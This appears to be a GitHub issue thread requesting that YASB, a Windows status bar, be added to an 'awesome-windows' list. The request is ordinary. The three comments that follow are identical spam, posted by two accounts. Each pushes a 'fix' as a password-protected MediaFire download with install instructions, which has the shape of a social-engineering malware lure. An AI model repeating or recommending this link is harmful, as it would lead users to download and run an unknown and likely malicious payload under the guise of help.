### ISSUE TITLE
[ADD] yasb

### ISSUE THREAD

**Issue by 0PandaDEV** [0PandaDEV/awesome-windows#10]
### Application Name

YASB

### Application URL

https://github.com/amnweb/yasb

### Category

Customization

### Description

A customizable status bar for windows

### Application Attributes

- [X] Free
- [X] Open Source
- [ ] Paid
- [ ] Freemium (free with paid features)

### Repository URL

https://github.com/amnweb/yasb

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
